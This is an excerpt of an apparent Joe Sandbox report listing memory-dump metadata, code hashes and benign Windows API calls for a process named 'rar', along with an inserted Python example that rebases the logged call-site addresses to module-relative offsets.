                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F13124A3A5868546F730DF28E4093A936A0FB48B78F105334DB6C866E5DF7CD585C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 932687459-0
                                                                                                                                                                                                                              • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                              • Instruction ID: 67644977c0d9c06b0a19f511c8c0f99975eb0b50d2453e55f9a6c1623ef681b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7212163A18E8582EB11CF29D5511BC6370FB9CB88B18A331DF9D42666EF28E5E58300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: a42658d34a1fb92fbd8d718425b99dc084056a970e35fbbcb39c16e60e17b306
                                                                                                                                                                                                                              • Instruction ID: 1593a0f6320ffdf65c572e48227819ac0300a234337f4eb168f4866e81c3dfb3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a42658d34a1fb92fbd8d718425b99dc084056a970e35fbbcb39c16e60e17b306
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4119031909B8281EA04EB68A5193ADB2A4FF98790F244635EB9D877F6DF7CE051C314
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                              • Instruction ID: 401c196ee56c934f0598c0c3e6199775cb61109fdb35e91719d26f966ac385ae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30018639A99A9151EA648F29F5045696271BF58BA0F149730DB6D87BE4CF3CE8418700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • setbuf.LIBCMT ref: 00007FF6BBCC7A7B
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBD12AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BBD17EF3
                                                                                                                                                                                                                              • setbuf.LIBCMT ref: 00007FF6BBCC7A8F
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCC7B44: GetStdHandle.KERNEL32(?,?,?,00007FF6BBCC7A9E), ref: 00007FF6BBCC7B4A
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCC7B44: GetFileType.KERNELBASE(?,?,?,00007FF6BBCC7A9E), ref: 00007FF6BBCC7B56
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCC7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF6BBCC7A9E), ref: 00007FF6BBCC7B69
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBD12ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BBD12AD0
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBD12B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BBD12C1C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
• String ID:
• API String ID: 4044681568-0
• Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
• Instruction ID: 98a5b58f43544f4a52c003200e2de22435dfabc90058202cc9f8e8fbc416e321
• Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
• Instruction Fuzzy Hash: D6010000F1D69205FA1CB37D54663B55452AF99310F584379E72D863F3CE5D64128395
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
• Instruction ID: d7993bbb6d00f7fc5c2760a371d5f02710446fd472af929730a4d774644ada9b
• Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
• Instruction Fuzzy Hash: BE017C22A48A8292EB68DF2DE4482692260FB48778F144331E73D891F5CF6CD586C740
APIs
• GetFileAttributesW.KERNELBASE(00000800,00007FF6BBCD305D,?,?,?,?,?,?,?,?,00007FF6BBCE4126,?,?,?,?,00000800), ref: 00007FF6BBCD30F0
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6BBCE4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6BBCD3119
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
• Instruction ID: f1dbf7347f89a6f7fb5bfc63d8fcfd0c08688575930f6673746d0db0660150c1
• Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
• Instruction Fuzzy Hash: 90F04F25B18AC145EA64DB29F4593A963A0BB8C7D4F800631EB9CC37AADF6CD5848B00
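The two GetFileAttributesW entries above log runtime addresses (the call site after "ref:" and stack slots such as 00007FF6BBCE4126) for a module the dump says is based at 00007FF6BBCB0000. To find the same code in the on-disk PE, in IDA, or in a run where ASLR picked a different base, those addresses have to be turned into RVAs. The following is an added example, not Joe Sandbox's code: it parses API-log lines and the "Memory Dump Source" offset as printed in this section, rebases each call site, and flags argument slots that point inside the image (in an x64 API log those are usually return addresses rather than real parameters). The sample text is copied from this section; the image size of 0xB0000 is an assumption for the in-image check, since the report does not state the mapped size.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: the API lines and the "Memory Dump Source" line of this
# function block, copied from the report section above.
SAMPLE_REPORT = """\
APIs
• GetFileAttributesW.KERNELBASE(00000800,00007FF6BBCD305D,?,?,?,?,?,?,?,?,00007FF6BBCE4126,?,?,?,?,00000800), ref: 00007FF6BBCD30F0
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6BBCE4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6BBCD3119
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
"""

# "<Function>.<Module>(<hex args or ?>), ref: <hex call-site address>"
API_LINE = re.compile(
    r"^\s*•?\s*(?P<func>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# The module base is printed as "Offset: <hex>" on the Source File line.
BASE_LINE = re.compile(r"Offset:\s*(?P<base>[0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[Optional[int]]   # None where the sandbox logged '?'
    ref: int                    # runtime address of the call site
    rva: Optional[int] = None   # call site relative to the module base, once known


def parse_args(raw: str) -> List[Optional[int]]:
    """Split the logged argument list; '?' means the sandbox could not read the slot."""
    out: List[Optional[int]] = []
    for tok in raw.split(","):
        tok = tok.strip()
        if not tok:
            continue
        out.append(None if tok == "?" else int(tok, 16))
    return out


def parse_section(text: str) -> Tuple[Optional[int], List[ApiCall]]:
    """Return (module base, API calls) for one function block of the report."""
    base: Optional[int] = None
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append(ApiCall(m["func"], m["module"], parse_args(m["args"]), int(m["ref"], 16)))
            continue
        m = BASE_LINE.search(line)
        if m:
            base = int(m["base"], 16)
    if base is not None:
        for call in calls:
            call.rva = call.ref - base
    return base, calls


def image_pointers(call: ApiCall, base: int, size: int) -> List[Tuple[int, int]]:
    """(argument index, RVA) for every logged slot that lies inside [base, base+size).

    Slots that point back into the image are almost always return addresses or
    code pointers picked up from the stack, which is what you want to pivot on
    when reconstructing the call chain; small constants like 0x800 are not."""
    hits: List[Tuple[int, int]] = []
    for idx, value in enumerate(call.args):
        if value is not None and base <= value < base + size:
            hits.append((idx, value - base))
    return hits


if __name__ == "__main__":
    IMAGE_SIZE = 0xB0000  # assumption: report does not state the mapped image size
    base, calls = parse_section(SAMPLE_REPORT)
    for c in calls:
        print(f"{c.func}.{c.module} call site {c.ref:#x} -> RVA {c.rva:#x}")
        for idx, rva in image_pointers(c, base, IMAGE_SIZE):
            print(f"  arg[{idx}] points into image at RVA {rva:#x}")
```

Feed the output RVAs to the IDA snapshot listed under "Joe Sandbox IDA Plugin" (or to the on-disk PE after accounting for section alignment) to land on the same GetFileAttributesW call sites regardless of where the loader placed the module in this run.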
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystem
• String ID:
• API String ID: 1175261203-0
• Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
• Instruction ID: 72b6066ea8370721c9ac9b3aec2fade9e7531b0a2bd3c74812b27ed2296d4200
• Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
• Instruction Fuzzy Hash: 24F03621B289C186F674DB24E8193FA6364BF9C784F804531EACDC26B9DF2CD244CB50
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: Process$AffinityCurrentMask
• String ID:
• API String ID: 1231390398-0
• Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
• Instruction ID: fd19eaaee1fe523d92d28f50f1c7705f1d0c7183f108302fa47fc1af008726ab
• Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
• Instruction Fuzzy Hash: 43E09B61B3459146DBDD9B1DD495FAD13A0BF58B80F806035F50BC3E64DE1DD5488B00
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                              • Instruction ID: 3b352b58d888d44c18bd0aed62541d11ea81368dfcef7a97ab5f791d227a3f23
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34E0EC61F1A55346FF5CABFBA8151741291BF8CB44F188A34DB1DC6372EE2CA4418E48
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: b1f78030b105e8ef79cd3893a111a15daa0c47b9b3a9a9d6e170b652ba698f98
                                                                                                                                                                                                                              • Instruction ID: 176c8c6301cc22cfb6f1a100596b3e382966391b07cf908edf8742990cd207b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1f78030b105e8ef79cd3893a111a15daa0c47b9b3a9a9d6e170b652ba698f98
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08E1D221A0868291FF21CB2C94582BE6771FF49B88F6441B6DF4D8B7E6DF2DA449C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 41fee4be509a7d6b9010376eb7811afad9251bec75b598907398f09de2282cd6
                                                                                                                                                                                                                              • Instruction ID: 7097bf5ecebfaf235a0ad12f157cc8e7189c3771c4c03baaf156b16ec66b8987
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41fee4be509a7d6b9010376eb7811afad9251bec75b598907398f09de2282cd6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1511673528BD295E701DF28A8452ED37A8F744F98F58423ADB884B7AADF385051C325
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
